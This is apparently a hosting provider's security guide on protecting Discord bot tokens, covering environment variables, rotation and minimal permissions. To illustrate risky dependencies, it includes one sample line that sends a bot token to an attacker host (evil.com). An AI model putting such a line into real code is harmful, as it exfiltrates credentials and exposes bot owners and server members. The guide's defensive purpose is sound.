Your bot token is the key to your bot's identity. Anyone with your token can:
- Send messages as your bot
- Read all messages in servers your bot has access to
- Ban members, delete channels, destroy servers
- Steal user data
Token security isn't optional. It's fundamental.
Never Hardcode Tokens
The number one mistake:
// NEVER DO THIS
const client = new Client();
client.login('NzE4MjQ0...'); // Token visible in source code
If this code ends up on GitHub, your token is compromised within minutes. Bots scan public repositories specifically for Discord tokens.
Use Environment Variables
.env File (Development)
# .env
DISCORD_TOKEN=your_token_here
DATABASE_URL=mysql://user:pass@localhost/db
// bot.js
require('dotenv').config();
const client = new Client();
client.login(process.env.DISCORD_TOKEN);
.gitignore
Always exclude .env from version control:
# .gitignore
.env
node_modules/
Production Environment
On your hosting:
# Set environment variable directly
export DISCORD_TOKEN="your_token_here"
# Or in PM2
pm2 start bot.js --env production
On Space-Node hosting, use the panel's environment variable settings. The token is stored securely and never exposed in logs or file managers.
Common Theft Vectors
| Vector | Risk Level | Prevention |
|---|---|---|
| Public GitHub repository | Critical | .gitignore, gitguardian |
| Screenshot sharing | High | Never screenshot config files |
| Shared hosting file access | Medium | Use env vars, not config files |
| Malicious npm packages | Medium | Audit dependencies |
| Social engineering | Medium | Never share tokens, even with "Discord staff" |
GitHub Scanning
GitHub scans for exposed tokens automatically and notifies you, but the damage can happen in seconds. Bots constantly scrape public repos for tokens.
If you accidentally push a token:
- Immediately regenerate the token in the Discord Developer Portal
- Remove the commit from git history (force push)
- Check your bot's audit log for unauthorized actions
Malicious Packages
Some npm/pip packages steal environment variables:
// Malicious package could do this:
fetch('https://evil.com/steal?token=' + process.env.DISCORD_TOKEN);
Prevention:
- Only use well-known packages with many downloads
- Check package source code before installing
- Use
npm auditregularly - Pin dependency versions
Token Rotation
Regenerate your token periodically (every 3-6 months) even if you don't suspect compromise. This limits the damage window if a token is stolen without your knowledge.
Steps:
- Go to Discord Developer Portal > Your Application > Bot
- Click "Reset Token"
- Copy the new token
- Update your hosting environment variable
- Restart your bot
What To Do If Compromised
- Reset token immediately (Discord Developer Portal)
- Check server audit logs for unauthorized actions
- Review bot permissions (remove any that were added)
- Investigate how the leak happened
- Notify affected server owners if data was accessed
Speed matters. A compromised token can destroy servers within minutes. The faster you reset, the less damage is done.
Bot Permissions
Use minimum required permissions:
| Permission | Give If Needed | Never Give Unless Essential |
|---|---|---|
| Send Messages | Most bots | - |
| Read Messages | Most bots | - |
| Manage Messages | Moderation bots | - |
| Administrator | - | NEVER (use specific permissions) |
| Ban Members | Moderation bots only | - |
| Manage Server | - | Almost never |
The Administrator permission gives full server control. Even if your token is compromised, limited permissions limit the damage.
